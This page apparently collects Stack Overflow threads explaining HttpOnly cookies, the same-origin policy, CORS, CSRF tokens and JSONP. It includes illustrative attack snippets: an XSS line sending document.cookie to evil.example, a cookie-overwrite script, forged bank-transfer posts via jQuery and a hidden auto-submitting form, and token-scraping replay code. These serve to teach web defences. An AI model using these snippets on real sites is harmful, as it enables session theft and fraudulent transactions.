JavaScript needs access to cookies if AJAX is used on a site with access restrictions based on cookies. Will HttpOnly cookies work on an AJAX site?
Edit: Microsoft created a way to prevent XSS attacks by disallowing JavaScript access to cookies if HttpOnly is specified. Firefox later adopted this. So my question is: if you are using AJAX on a site, like Stack Overflow, are HttpOnly cookies an option?
Edit 2: Question 2. If the purpose of HttpOnly is to prevent JavaScript access to cookies, and you can still retrieve the cookies via JavaScript through the XmlHttpRequest Object, what is the point of HttpOnly?
Edit 3: Here is a quote from Wikipedia:
When the browser receives such a cookie, it is supposed to use it as usual in the following HTTP exchanges, but not to make it visible to client-side scripts.[32] The HttpOnly flag is not part of any standard, and is not implemented in all browsers. Note that there is currently no prevention of reading or writing the session cookie via a XMLHTTPRequest. [33].
I understand that document.cookie is blocked when you use HttpOnly. But it seems that you can still read cookie values in the XMLHttpRequest object, allowing for XSS. How does HttpOnly make you any safer, then? By making cookies essentially read-only?
In your example, I cannot write to your document.cookie, but I can still steal your cookie and post it to my domain using the XMLHttpRequest object.
<script type="text/javascript">
// Create an XMLHttpRequest, falling back to the ActiveX objects used by older IE.
var req = null;
try { req = new XMLHttpRequest(); } catch(e) {}
if (!req) try { req = new ActiveXObject("Msxml2.XMLHTTP"); } catch(e) {}
if (!req) try { req = new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) {}
// Synchronous GET, then dump every response header the browser exposes.
req.open('GET', 'http://stackoverflow.com/', false);
req.send(null);
alert(req.getAllResponseHeaders());
</script>
Edit 4: Sorry, I meant that you could send the XMLHttpRequest to the StackOverflow domain, and then save the result of getAllResponseHeaders() to a string, regex out the cookie, and then post that to an external domain. It appears that Wikipedia and ha.ckers concur with me on this one, but I would love to be re-educated...
Final Edit: Ah, apparently both sites are wrong; this is actually a bug in Firefox. IE6 and IE7 are actually the only browsers that currently fully support HttpOnly.
To reiterate everything I've learned:
HttpOnly restricts all access to document.cookie in IE7 and Firefox (not sure about other browsers)
HttpOnly removes cookie information from the response headers in XMLHttpRequest.getAllResponseHeaders() in IE7.
XMLHttpRequests may only be submitted to the domain they originated from, so there is no cross-domain posting of the cookies.
edit: This information is likely no longer up to date.
Yes, HTTP-Only cookies would be fine for this functionality. They will still be provided with the XmlHttpRequest's request to the server.
In the case of Stack Overflow, the cookies are automatically provided as part of the XmlHttpRequest request. I don't know the implementation details of the Stack Overflow authentication provider, but that cookie data is probably automatically used to verify your identity at a lower level than the "vote" controller method.
More generally, cookies are not required for AJAX. XmlHttpRequest support (or even iframe remoting, on older browsers) is all that is technically required.
However, if you want to provide security for AJAX enabled functionality, then the same rules apply as with traditional sites. You need some method for identifying the user behind each request, and cookies are almost always the means to that end.
In your example, I cannot write to your document.cookie, but I can still steal your cookie and post it to my domain using the XMLHttpRequest object.
XmlHttpRequest won't make cross-domain requests (for exactly the sorts of reasons you're touching on).
You could normally inject script to send the cookie to your domain using iframe remoting or JSONP, but then HTTP-Only protects the cookie again since it's inaccessible.
Unless you had compromised StackOverflow.com on the server side, you wouldn't be able to steal my cookie.
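For illustration, this is the classic sort of injected exfiltration script that HttpOnly is meant to neutralize (evil.example is an invented placeholder): with HttpOnly set, document.cookie simply does not contain the session cookie, so there is nothing useful to send.
// Injected attacker script; evil.example is invented. Without HttpOnly this
// leaks the victim's cookies; with HttpOnly the session cookie never appears
// in document.cookie, so the beacon carries nothing of value.
new Image().src = 'http://evil.example/steal?c=' + encodeURIComponent(document.cookie);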
Edit 2: Question 2. If the purpose of Http-Only is to prevent JavaScript access to cookies, and you can still retrieve the cookies via JavaScript through the XmlHttpRequest Object, what is the point of Http-Only?
Consider this scenario:
I find an avenue to inject JavaScript code into the page.
Jeff loads the page and my malicious JavaScript modifies his cookie to match mine.
Jeff submits a stellar answer to your question.
Because he submits it with my cookie data instead of his, the answer will become mine.
You vote up "my" stellar answer.
My real account gets the point.
With HTTP-Only cookies, the second step would be impossible, thereby defeating my XSS attempt.
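As a sketch of that second step (the cookie name here is a guess, not Stack Overflow's real one), the injected script would attempt something like the following; in browsers that honor HttpOnly, a document.cookie write cannot replace the HttpOnly session cookie, so the attempt fails.
// Hypothetical injected script for step 2; "usr" is an invented cookie name.
// If the real session cookie is flagged HttpOnly, the browser ignores this
// attempt to overwrite it, so Jeff keeps his own identity.
document.cookie = 'usr=ATTACKERS_SESSION_VALUE; path=/';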
Edit 4: Sorry, I meant that you could send the XMLHttpRequest to the StackOverflow domain, and then save the result of getAllResponseHeaders() to a string, regex out the cookie, and then post that to an external domain. It appears that Wikipedia and ha.ckers concur with me on this one, but I would love to be re-educated...
That's correct. You can still session hijack that way. It does significantly thin the herd of people who can successfully execute even that XSS hack against you though.
However, if you go back to my example scenario, you can see where HTTP-Only does successfully cut off the XSS attacks which rely on modifying the client's cookies (not uncommon).
It boils down to the fact that a) no single improvement will solve all vulnerabilities and b) no system will ever be completely secure. HTTP-Only is a useful tool in shoring up against XSS.
Similarly, even though the cross domain restriction on XmlHttpRequest isn't 100% successful in preventing all XSS exploits, you'd still never dream of removing the restriction.
Yes, they are a viable option for an Ajax based site. Authentication cookies aren't for manipulation by scripts, but are simply included by the browser on all HTTP requests made to the server.
Scripts don't need to worry about what the session cookie says - as long as you are authenticated, then any requests to the server initiated by either a user or the script will include the appropriate cookies. The fact that the scripts cannot themselves know the content of the cookies doesn't matter.
Cookies that are used for purposes other than authentication can be set without the HttpOnly flag if you want scripts to be able to read or modify them. You can pick and choose which cookies should be HttpOnly, so, for example, anything non-sensitive like UI preferences (sort order, whether the left-hand pane is collapsed) can be shared in cookies with the scripts.
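As an illustration (the cookie names and values here are made up), the server's response might mark only the session cookie as HttpOnly:
Set-Cookie: session=abc123; Path=/; Secure; HttpOnly
Set-Cookie: sortOrder=asc; Path=/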
I really like the HTTP only cookies - it's one of those proprietary browser extensions that was a really neat idea.
Not necessarily; it depends on what you want to do. Could you elaborate a bit? AJAX doesn't need access to cookies to work: it can make requests on its own to extract information, and the page that the AJAX call requests can access the cookie data and pass it back to the calling script without JavaScript having to access the cookies directly.
As clarification: from the server's perspective, the page requested by an AJAX call is essentially no different from a standard HTTP GET request made by the user clicking on a link. All the normal request properties (user-agent, IP, session, cookies, etc.) are passed to the server.
There's a bit more to this.
Ajax doesn't strictly require cookies, but they can be useful, as other posters have mentioned. Marking a cookie HttpOnly to hide it from scripts only partially works: not all browsers support it, and there are common workarounds.
It's odd that the XMLHttpRequest response headers are giving up the cookie; technically the server doesn't have to return the cookie with the response. Once it's set on the client, it stays set until it expires (though there are schemes in which the cookie is changed with every request to prevent re-use). So you may be able to avoid that workaround by changing the server so it does not provide the cookie on the XMLHttpRequest responses.
In general though, I think HTTPOnly should be used with some caution. There are cross site scripting attacks where an attacker arranges for a user to submit an ajax-like request originating from another site, using simple post forms, without the use of XMLHTTP, and your browser's still-active cookie would authenticate the request.
If you want to be sure that an AJAX request is authenticated, the request itself AND the HTTP headers need to contain the cookie, e.g. through the use of scripts or unique hidden inputs. HttpOnly would hinder that.
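For example (the cookie and field names are invented, and this only works when the cookie is not HttpOnly), a script could echo the cookie value in the request body so the server can compare it against the cookie it receives in the headers:
// Double-submit style check: read the (non-HttpOnly) session cookie and repeat
// it inside the POST body; the server compares it with the cookie sent in the
// headers. Cookie name, endpoint, and fields here are illustrative.
var match = document.cookie.match(/(?:^|;\s*)session=([^;]*)/);
var xhr = new XMLHttpRequest();
xhr.open('POST', '/transfer', true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send('amount=100&session_echo=' + encodeURIComponent(match ? match[1] : ''));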
Usually the interesting reason to want HTTPOnly is to prevent third-party content included on your webpage from stealing cookies. But there are many interesting reasons to be very cautious about including third-party content, and filter it aggressively.
Cookies are automatically handled by the browser when you make an AJAX call, so there's no need for your Javascript to mess around with cookies.
Therefore I am assuming JavaScript needs access to your cookies.
All HTTP requests from your browser transmit your cookie information for the site in question. JavaScript can both set and read cookies. Cookies are not by definition required for Ajax applications, but they are required for most web applications to maintain user state.
The formal answer to your question as phrased - "Does JavaScript need access to cookies if AJAX is used?" - is therefore "no". Think of enhanced search fields that use Ajax requests to provide auto-suggest options, for example. There is no need for cookie information in that case.
No, the page that the AJAX call requests has access to cookies too, and that's what checks whether you're logged in.
You can do other authentication with the Javascript, but I wouldn't trust it, I always prefer putting any sort of authentication checking in the back-end.
Yes, cookies are very useful for Ajax.
Putting the authentication in the request URL is bad practice. There was a news item last week about authentication tokens in URLs turning up in the Google cache.
No, there is no way to prevent these attacks entirely. Older browsers still allow trivial access to cookies via JavaScript, HttpOnly can be bypassed, and so on. Whatever you come up with can be gotten around given enough effort. The trick is to make it too much effort to be worthwhile.
If you want to make your site more secure (there is no perfect security), you could use an authentication cookie that expires. Then, if the cookie is stolen, the attacker must use it before it expires. If they don't, then you have a good indication there's suspicious activity on that account. The shorter the time window, the better for security, but the more load it puts on your server generating and maintaining keys.
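For example (the token value and lifetime here are invented), such a short-lived authentication cookie could be issued like this:
Set-Cookie: auth=token123; Max-Age=900; Path=/; Secure; HttpOnly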
Related
Is there any way to access a secure cookie from a Greasemonkey script?
I wrote a script that uses the document.cookie.split function. It returns a list of cookies, but it doesn't include the secure cookie(s).
I'm guessing you really mean cookies with the HttpOnly attribute set. (See, also, Wikipedia for HttpOnly cookie.)
In that case, you cannot access these cookies from Greasemonkey because they are forbidden to JavaScript, and because Greasemonkey does not provide an alternate mechanism to see them.
You can try making a feature request, but I'm not optimistic about its reception. (Try anyway.)
Firefox add-ons can work with these cookies, so you can fork the Greasemonkey source yourself or write a helper add-on (example) to get to these cookies.
If you mean cookies with the Secure attribute (Cookies that must be sent only over HTTPS), then I believe you can access those from injected code in the target page scope, but I'm not set up to test this at the moment. (The target page must be loaded over HTTPS and on the exact same domain as the cookies you want.)
I was trying to understand CORS. As per my understanding, it is a security mechanism implemented in browsers to prevent any AJAX request to a domain other than the one opened by the user (the one specified in the URL).
Now, because of this limitation, CORS was implemented to enable websites to make cross-origin requests. But as per my understanding, implementing CORS defeats the security purpose of the Same Origin Policy (SOP).
CORS just provides extra control over which requests the server wants to serve. Maybe it can help avoid spammers.
From Wikipedia:
To initiate a cross-origin request, a browser sends the request with an Origin HTTP header. The value of this header is the site that served the page. For example, suppose a page on http://www.social-network.example attempts to access a user's data in online-personal-calendar.example. If the user's browser implements CORS, the following request header would be sent:
Origin: http://www.social-network.example
If online-personal-calendar.example allows the request, it sends an Access-Control-Allow-Origin header in its response. The value of the header indicates what origin sites are allowed. For example, a response to the previous request would contain the following:
Access-Control-Allow-Origin: http://www.social-network.example
If the server does not allow the cross-origin request, the browser will deliver an error to the social-network.example page instead of the online-personal-calendar.example response.
To allow access to all pages, a server can send the following response header:
Access-Control-Allow-Origin: *
However, this might not be appropriate for situations in which security is a concern.
What am I missing here? What is the intent of CORS: to secure the server, or to secure the client?
Same-origin policy
What is it?
The same-origin policy is a security measure standardized among browsers. The "origin" mostly refers to a "domain". It prevents different origins from interacting with each other, to prevent attacks such as Cross Site Request Forgery.
How does a CSRF attack work?
Browsers allow websites to store information on a client's computer, in the form of cookies. These cookies have some information attached to them, like the name of the cookie, when it was created, when it will expire, who set the cookie etc. A cookie looks something like this:
Cookie: cookiename=chocolate; Domain=.bakery.example; Path=/ [;otherData]
So this is a chocolate cookie, which should be accessible from http://bakery.example and all of its subdomains.
This cookie might contain some sensitive data. In this case, that data is... chocolate. Highly sensitive, as you can see.
So the browser stores this cookie. And whenever the user makes a request to a domain on which this cookie is accessible, the cookie would be sent to the server for that domain. Happy server.
This is a good thing. Super cool way for the server to store and retrieve information on and from the client-side.
But the problem is that this allows http://malicious-site.example to send those cookies to http://bakery.example, without the user knowing! For example, consider the following scenario:
# malicious-site.example/attackpage
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://bakery.example/order/new?deliveryAddress="address of malicious user"');
xhr.send();
If you visit the malicious site and the above code executes, and the same-origin policy were not there, the malicious user would place an order on your behalf and get it delivered to his place... and you might not like this.
This happened because your browser sent your chocolate cookie to http://bakery.example, which made http://bakery.example think that you are making the request for the new order, knowingly. But you aren't.
This is, in plain words, a CSRF attack. A forged request was made across sites. "Cross Site Request Forgery". And it would not work, thanks to the same-origin policy.
How does Same-origin policy solve this?
It stops the malicious-site.example from making requests to other domains. Simple.
In other words, the browser would not allow any site to make a request to any other site. It would prevent different origins from interacting with each other through such requests, like AJAX.
However, resource loading from other hosts (images, scripts, stylesheets, iframes, form submissions, etc.) is not subject to this limitation. We need another wall to protect our bakery from the malicious site, by using CSRF tokens.
CSRF Tokens
As stated, malicious site can still do something like this without violating the same-origin policy:
<img src='http://bakery.example/order/new?deliveryAddress="address of malicious user"'/>
And the browser will try to load an image from that URL, resulting in a GET request to that URL sending all the cookies. To stop this from happening, we need some server side protection.
Basically, we attach a random, unique token of suitable entropy to the user's session, store it on the server, and also send it to the client with the form. When the form is submitted, client sends that token along with the request, and server verifies if that token is valid or not.
Now that we have done this, if the malicious website sends the request again, it will always fail, since there is no feasible way for the malicious website to know the token for the user's session.
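Here is a minimal sketch of that token scheme, assuming a plain Node.js server with an in-memory session store; the paths, cookie handling, and names (SESSIONS, /order/new, csrf) are all illustrative, not a definitive implementation:
// Minimal CSRF-token sketch; everything named here is invented for illustration.
const http = require('http');
const crypto = require('crypto');

const SESSIONS = new Map(); // sessionId -> { csrfToken }

http.createServer((req, res) => {
  // Assume a "sid" cookie identifies the session (cookie parsing kept crude on purpose).
  const sessionId = ((req.headers.cookie || '').match(/sid=([^;]+)/) || [])[1] || 'anon';

  if (req.method === 'GET' && req.url === '/order/form') {
    // Attach a random, unique token to the session and embed it in the form.
    const csrfToken = crypto.randomBytes(32).toString('hex');
    SESSIONS.set(sessionId, { csrfToken });
    res.setHeader('Content-Type', 'text/html');
    res.end('<form method="POST" action="/order/new">' +
            '<input type="hidden" name="csrf" value="' + csrfToken + '">' +
            '<input name="deliveryAddress"><button>Order</button></form>');
  } else if (req.method === 'POST' && req.url === '/order/new') {
    let body = '';
    req.on('data', chunk => { body += chunk; });
    req.on('end', () => {
      const sent = new URLSearchParams(body).get('csrf');
      const expected = (SESSIONS.get(sessionId) || {}).csrfToken;
      // A forged cross-site request cannot know the token, so it fails here.
      if (!expected || sent !== expected) {
        res.statusCode = 403;
        return res.end('CSRF token mismatch');
      }
      res.end('Order accepted');
    });
  } else {
    res.statusCode = 404;
    res.end();
  }
}).listen(8080);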
CORS
When cross-site requests are genuinely required, the policy can be relaxed. This is known as CORS: Cross-Origin Resource Sharing.
This works by having the "domains" tell the browser to chill, and allow such requests. This "telling" thing can be done by passing a header. Something like:
Access-Control-Allow-Origin: //comma separated allowed origins list, or just *
So if http://bakery.example passes this header to the browser, and the page creating the request to http://bakery.example is present in the origin list, then the browser will let the request go, along with the cookies.
There are rules according to which the origin is defined [1]. For example, different ports for the same domain are not the same origin. So the browser might decline this request if the ports are different. As always, our dear Internet Explorer is the exception to this. IE treats all ports the same way. This is non-standard and no other browser behaves this way. Do not rely on this.
JSONP
JSON with Padding is just a way to circumvent same-origin policy, when CORS is not an option. This is risky and a bad practice. Avoid using this.
What this technique involves is making a request to the other server like following:
<script src="http://badbakery.example/jsonpurl?callback=cake"></script>
Since the same-origin policy does not prevent this [2] request, the response of this request will be loaded into the page.
This URL would most probably respond with JSON content. But just including that JSON content on the page is not gonna help; it would result in an error, of course. So http://badbakery.example accepts a callback parameter, and modifies the JSON data, sending it wrapped in whatever is passed to the callback parameter.
So instead of returning,
{ user: "vuln", acc: "B4D455" }
which is invalid JavaScript throwing an error, it would return,
cake({user: "vuln", acc:"B4D455"});
which is valid JavaScript; it gets executed, and probably stored somewhere according to the cake function, so that the rest of the JavaScript on the page can use the data.
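For completeness, the page making that JSONP request defines the callback itself, roughly like this (the handling inside is just a placeholder):
// The page's own definition of the callback named in the ?callback= parameter.
// Whatever badbakery.example wraps in cake(...) arrives here as an object.
function cake(data) {
  console.log(data.user, data.acc); // placeholder handling of the received data
}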
This is mostly used by APIs to send data to other domains. Again, this is a bad practice, can be risky, and should be strictly avoided.
Why is JSONP bad?
First of all, it is very limited. You can't handle any errors if the request fails (at least not in a sane way). You can't retry the request, etc.
It also requires you to have a cake function in the global scope which is not very good. May the cooks save you if you need to execute multiple JSONP requests with different callbacks. This is solved by temporary functions by various libraries but is still a hackish way of doing something hackish.
Finally, you are inserting random JavaScript code in the DOM. If you aren't 100% sure that the remote service will return safe cakes, you can't rely on this.
References
1. https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy#Definition_of_an_origin
2. https://www.w3.org/Security/wiki/Same_Origin_Policy#Details
Other worthy reads
http://scarybeastsecurity.blogspot.dk/2009/12/generic-cross-browser-cross-domain.html
https://www.rfc-editor.org/rfc/rfc3986 (sorry :p)
https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
The Same Origin Policy (SOP) is the policy browsers implement to prevent vulnerabilities via Cross Site Scripting (XSS). This is mainly for protecting the server, as there are many occasions when a server can be dealing with authentication, cookies, sessions, etc.
The Cross Origin Resource Sharing (CORS) is one of the few techniques for relaxing the SOP. Because SOP is "on" by default, setting CORS at the server-side will allow a request to be sent to the server via an XMLHttpRequest even if the request was sent from a different domain. This becomes useful if your server was intended to serve requests from other domains (e.g. if you are providing an API).
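As a rough sketch (plain Node.js, with a made-up allowed origin), "setting CORS at the server side" just means adding the appropriate response header:
// Minimal sketch of a server opting in to cross-origin reads from one origin.
const http = require('http');

http.createServer((req, res) => {
  // Browsers will let pages from this origin read the response via XMLHttpRequest.
  res.setHeader('Access-Control-Allow-Origin', 'http://www.social-network.example');
  res.setHeader('Content-Type', 'application/json');
  res.end(JSON.stringify({ ok: true }));
}).listen(8080);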
I hope this clears up the distinction between SOP and CORS and the purposes of each.
I'm trying to determine the most secure method for an ajax based login form to authenticate and set a client side cookie. I've seen things about XSS attacks such as this:
How do HttpOnly cookies work with AJAX requests?
and
http://www.codinghorror.com/blog/archives/001167.html
So, I guess my core questions are...
1) Is using pure AJAX to set cookies secure? If so, what is the most secure method (HttpOnly + SSL + encrypted values, etc.)?
2) Does a pure ajax method involve setting the cookie client side? Is this at all secure?
3) Is setting cookies this way reliable across all major browsers/OSs?
4) Would using a hidden IFrame be any more secure (calling a web page to set the cookies)?
5) If possible, does anybody have code for this (PHP is my backend)?
My goal is to set the cookies and have them available for the next call to the server without navigating away from the page.
I really want to nail down the consensus, most secure way to do this. Eventually, this code is planned to be made open source, so please no commercial code (or anything that wouldn't stand up to public scrutiny).
Thanks,
-Todd
The cookie needs to be generated server-side because the session binds the client to the server, and therefore the token exchange must go from server to client at some stage. It would not really be useful to generate the cookie client-side, because the client is the untrusted remote machine.
It is possible to have the cookie set during an AJAX call. To the server (and the network) an AJAX call is simply an HTTP call, and any HTTP response by the server can set a cookie. So yes, it is possible to initiate a session in response to an AJAX call, and the cookie will be stored by the client as normal.
So, you can use AJAX to do the logging-in process in the same way as you could have just relied on a POST from a form on the page. The server will see them the same way, and if the server sets a cookie, the browser will store it.
Basically, client-side Javascript never needs to be able to know the value of the cookie (and it is better for security if it doesn't, which can be achieved using the "httponly" cookie extension honored by recent browsers). Note that further HTTP calls from the client to the server, whether they are normal page requests or they are AJAX requests, will include that cookie automatically, even if it's marked httponly and the browser honors that extension. Your script does not need to be 'aware' of the cookie.
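A small client-side sketch of that flow (the /login endpoint and field names are assumptions, not from the original post): the script never touches the cookie; the browser stores whatever Set-Cookie header, HttpOnly or not, comes back with the response.
// Log in over AJAX; the session cookie set by the response is stored by the
// browser and sent automatically on later requests, even if it is HttpOnly.
var xhr = new XMLHttpRequest();
xhr.open('POST', '/login', true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.onload = function () {
  if (xhr.status === 200) {
    console.log('Logged in; subsequent requests will carry the session cookie.');
  }
};
xhr.send('username=alice&password=secret');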
You mentioned using HTTPS (HTTP over SSL): that prevents others from reading information in transit or impersonating the server, so it's very handy for preventing plain-text transmission of the password or other important information. It can also help guard against network-based attacks, though it does not make you immune to everything that CSRF can throw at you, and it does not at all protect you against the likes of session fixation or XSS. So I would avoid thinking of HTTPS as a fix-all if you use it: you still need to be vigilant about cross-site scripting and cross-site request forgery.
(see 1. I sort of combined them)
Given that the cookie is set by the server in its HTTP response headers, yes it is reliable. However, to make it cross-browser compatible you still need to ensure logging in is possible when AJAX is unavailable. This may require implementing an alternative that is seen only when there is no Javascript or if AJAX isn't available. (Note: now in 2014, you don't need to worry about browser support for AJAX anymore).
It would not change the security. There would be no need for it, except that I have seen hidden iframes used before to 'simulate' AJAX, i.e. to make asynchronous calls to the server. Basically, however you do it doesn't matter: it's the server setting the cookie, and the client will accept and return the cookie whether it does so by AJAX or not.
For the most part, whether you use AJAX or not does not affect the security all that much, as all the real security happens on the server side, and to the server an AJAX call is just like a non-AJAX call: not to be trusted. Therefore you'll need to be aware of issues such as session fixation and login CSRF, as well as issues affecting the session as a whole like CSRF and XSS, just as much as you would if you were using no AJAX. The issues don't really change when using AJAX, except, I guess, that you may make more mistakes with a technology if you're less familiar with it or it's more complicated.
Answer updated September 2014
Why was it decided that using XMLHttpRequest for doing XML calls should not do calls across the domain boundary? You can retrieve JavaScript, images, CSS, iframes, and just about any other content I can think of from other domains. Why are the Ajax HTTP requests not allowed to cross domain boundaries? It seems like an odd limitation to impose, considering the only way I could see it being abused would be if someone were to inject JavaScript into the page. However, in this case, you could simply add an img, script, or iframe element to the document to get it to request the third-party URL and send it to the server.
[Edit]
Some of the answers point out the following reasons; let's point out why they don't amount to a major reason to disallow this.
XSRF (Cross Site Request Forgery, also known as CSRF, XSRF)
You can do XSRF attacks without using this at all. As a general rule, XMLHttpRequest isn't used for them, simply because it's so hard to construct an XMLHttpRequest in a way that's compatible with all major browsers. It's much easier to just add an img tag pointing at the URL if you want the victim to load your URL.
Posting to third party site
<script type="text/javascript">
$.post("http://some-bank.com/transfer-money.php",
{ amount: "10000", to_account: "xxxx" })
</script>
Could be accomplished with
<body onload="document.getElementById('InvisbleForm').submit()">
<div style="display:none">
<form id="InvisbleForm" action="http://some-bank.com/transfer-money.php" method="POST">
<input type="hidden" name="amount" value="10000">
<input type="hidden" name="to_account" value="xxxxx">
</form>
</div>
</body>
JPunyon: why would you leave the vulnerability in a new feature?
You aren't creating any more insecurities. You are just inconveniencing developers who want to use it in a way for good. Anybody who wants to use this feature for evil (aka awesome) could just use some other method of doing it.
Conclusion
I'm marking the answer from bobince as correct because he pointed out the critical problem. Because XMLHttpRequest lets you POST to the destination site with credentials (cookies) and read the data sent back, you could orchestrate some JavaScript that would submit a series of forms, including confirmation forms, complete with any randomly generated keys that were put in place to try to prevent XSRF. In this way, you could browse through the target site, like a bank, and the bank's web server would be unable to tell that it wasn't just a regular user submitting all these forms.
Why are Ajax HTTP requests not allowed to cross domain boundaries?
Because AJAX requests are (a) submitted with user credentials, and (b) allow the caller to read the returned data.
It is a combination of these factors that can result in a vulnerability. There are proposals to add a form of cross-domain AJAX that omits user credentials.
you could simply add an img, script, or iframe element to the document
None of those methods allow the caller to read the returned data.
(Except scripts where either it's deliberately set up to allow that, for permitted cross-domain scripting - or where someone's made a terrible cock-up.)
You can do XSS attacks without using this at all. Posting to third party site
That's not an XSS attack. That's a cross-site request forgery attack (XSRF). There are known ways to solve XSRF attacks, such as including one-time or cryptographic tokens to verify that the submission came deliberately from the user and was not launched from attacker code.
If you allowed cross-domain AJAX you would lose this safeguard. The attacking code could request a page from the banking site, read any authorisation tokens on it, and submit them in a second AJAX request to perform the transfer. And that would be a cross-site scripting attack.
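To make that concrete, here is a hypothetical sketch of what attacker code could do if credentialed cross-domain XHR were permitted; the bank URL, token markup, and field names are all invented for illustration.
// Hypothetical only: impossible under the same-origin policy. Step 1: fetch the
// bank page (the victim's cookies would ride along) and scrape its anti-XSRF
// token. Step 2: replay that token in a forged transfer request.
var read = new XMLHttpRequest();
read.open('GET', 'http://some-bank.example/transfer-form', true);
read.onload = function () {
  var token = (read.responseText.match(/name="csrf_token" value="([^"]+)"/) || [])[1];
  if (!token) return;
  var post = new XMLHttpRequest();
  post.open('POST', 'http://some-bank.example/transfer-money.php', true);
  post.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  post.send('amount=10000&to_account=xxxx&csrf_token=' + token);
};
read.send();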
An important difference between the POST:
<body onload="document.getElementById('InvisbleForm').submit()" ...
and Ajax is that after doing any normal POST the browser replaces the page, while after the Ajax call it does not. The result of the POST will be:
Clearly visible to the user.
The attack will be stuck at this point, because the response page from my-bank.com will take control. No bank will implement a one-click transfer.
The scenario of XSRF, if cross-domain Ajax were allowed, would look like the following:
User somehow visits www.bad-guy.com.
If there is no open page for my-bank.com in another instance of the browser, the attack is unsuccessful.
But if such a page is open and the user has already entered his user-name/password, this means that there is a cookie for this session stored in the browser.
JavaScript code on the page from www.bad-guy.com makes an Ajax call to my-bank.com.
For the browser this is a regular HTTP call, it has to send the my-bank cookies to my-bank.com and it sends them.
Bank processes this request because it cannot distinguish this call from the regular activity of the user.
The fact that JavaScript code can read the response is not important. In the attack case this might not be necessary. What is really important is that the user in front of the computer will have no idea that this interaction takes place. He will look at nice pictures on the www.bad-guy.com page.
JavaScript code makes several other calls to my-bank.com if this is needed.
The gist is that no injection or any page tampering is needed.
A better solution might be to allow the call itself but not to send any cookies. This is a very simple solution that does not require any extensive development. In many cases the Ajax call goes to an unprotected location, so not sending cookies would not be a limitation.
The CORS (Cross-Origin Resource Sharing) proposal that is under discussion now, among other things, addresses sending or not sending cookies.
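For what it's worth, that is roughly where CORS landed: a cross-origin XMLHttpRequest only attaches cookies when the script opts in and the server allows credentials (the URL below is a placeholder).
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://api.example/public-data', true);
// Cookies are omitted from cross-origin requests unless this is set to true
// AND the server answers with Access-Control-Allow-Credentials: true.
xhr.withCredentials = false; // the default; shown explicitly for illustration
xhr.send();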
Well, apparently you're not the only person that feels that way...
http://www.google.com/search?q=xmlhttp+cross+site
EDIT: There is an interesting discussion linked from the above search:
http://blogs.msdn.com/ie/archive/2008/06/23/securing-cross-site-xmlhttprequest.aspx
Looks like proposals are under way to permit cross site xmlhttp requests (IE 8, FF3 etc.), although I wish they'd been there when I was writing the code for my sites :)
And then there's the problem of compatibility... It will be a while before it's ubiquitous.
When you send an HTTP request to the server, the cookies set by the server are also sent back by the browser to the server. The server uses those cookies to establish the fact that the user is logged in, etc.
This can be exploited by a malicious attacker who, with the help of some JavaScript, can steal information or perform unauthorised commands on other websites without the user knowing anything about this.
For example, one could ask a user to visit a site which has the following JavaScript code (assuming jQuery):
<script type="text/javascript">
$.post("http://some-bank.com/transfer-money.php",
{ amount: "10000", to_account: "xxxx" })
</script>
Now, if the user were really logged into the bank while the above code was executed, the attacker could have transferred USD 10K to the account XXX.
This kind of attack is called Cross-Site Request Forgery (XSRF). There is more info about this on Wikipedia.
It's mainly due to this reason the same-origin policy exists and browsers won't allow you to perform XMLHttpRequests on domains different from the origin.
There is some discussion going on to actually allow cross-domain XHR, but we have to see whether this really gets accepted.
It's a concern because it can be used for bad purposes, as you mentioned. It can also be used with good intent, and for that reason, cross domain protocols are being developed.
The two biggest concerns are when it is used in conjunction with cross-site scripting (XSS) and cross-site request forgery (CSRF). Both are serious threats (which is why they made it into the OWASP top 10 and the SANS 25).
the only way I could see it being abused, would be if someone were to inject Javascript
This is XSS. Far too many apps are still vulnerable, and if browser security models don't prevent cross-domain AJAX, they are opening their users to a considerable attack vector.
you could simply add an img, script, or iframe element to the document to get it to request the third party URL
Yes, but those will send an HTTP referrer header and (through other means) can be blocked to prevent CSRF. AJAX calls can spoof headers more easily and would allow other means of circumventing traditional CSRF protections.
I think another thing that separates this from a normal XSRF attack is that you can do stuff with the data you get back as well via javascript.
I don't know what the huge problem is. Have AJAX calls aimed at other domains first go to your own application and then be forwarded elsewhere with filtered data; parse the returned data if you really need to, and feed it to the user.
Handling sensitive AJAX requests? Nail down the incoming suckers by checking for headers, storing session time data, or filtering incoming IP addresses down to sources you trust or your own applications.
What I'd personally like to see in the future is rock solid security on all incoming requests by default on web servers, frameworks and CMSs, and then explicitly define resources that will parse request from outside sources.
With <form> you can post data, but you can't read it. With XHR you can do both.
A page like http://bank.example.com/display_my_password is safe against XSRF (assuming it only displays the password and does not set it) and against frames (they have the same-origin policy). However, cross-domain XHR would be a vulnerability.
You turn unsuspecting visitors into denial of service attackers.
Also, imagine a cross-site script that steals all your Facebook stuff. It opens an iframe and navigates to Facebook.com.
You're already logged in to Facebook (cookie), so it reads your data and friends, and does more nasties.
I have done a bit of testing on this myself (during the server-side processing of a DWR Framework Ajax request handler, to be exact), and it seems you CAN successfully manipulate cookies, but this goes against much of what I have read on Ajax best practices and how browsers interpret the response from an XmlHttpRequest. Note I have tested on:
IE 6 and 7
Firefox 2 and 3
Safari
and in all cases standard cookie operations on the HttpServletResponse object during Ajax request handling were correctly interpreted by the browser, but I would like to know if it is best practice to push the cookie manipulation to the client side, or if this (much cleaner) server-side cookie handling can be trusted.
I would welcome answers both specific to the DWR Framework and Ajax in general.
XMLHttpRequest always uses the Web Browser's connection framework. This is a requirement for AJAX programs to work correctly as the user would get logged out if the XHR object lacked access to the browser's cookie pool.
It's theoretically possible for a web browser to simply share session cookies without using the browser's connection framework, but this has never (to my knowledge) happened in practice. Even the Flash plugin uses the Web Browser's connections.
Thus the end result is that it IS safe to manipulate cookies via AJAX. Just keep in mind that the AJAX call might never happen. They are not guaranteed events, so don't count on them.
In the context of DWR it may not be "safe".
From reading the DWR site it says:
It is important that you treat the HTTP request and response as read-only. While HTTP headers might get through OK, there is a good chance that some browsers will ignore them.
I've taken this to mean that setting cookies or request attributes is a no-no.
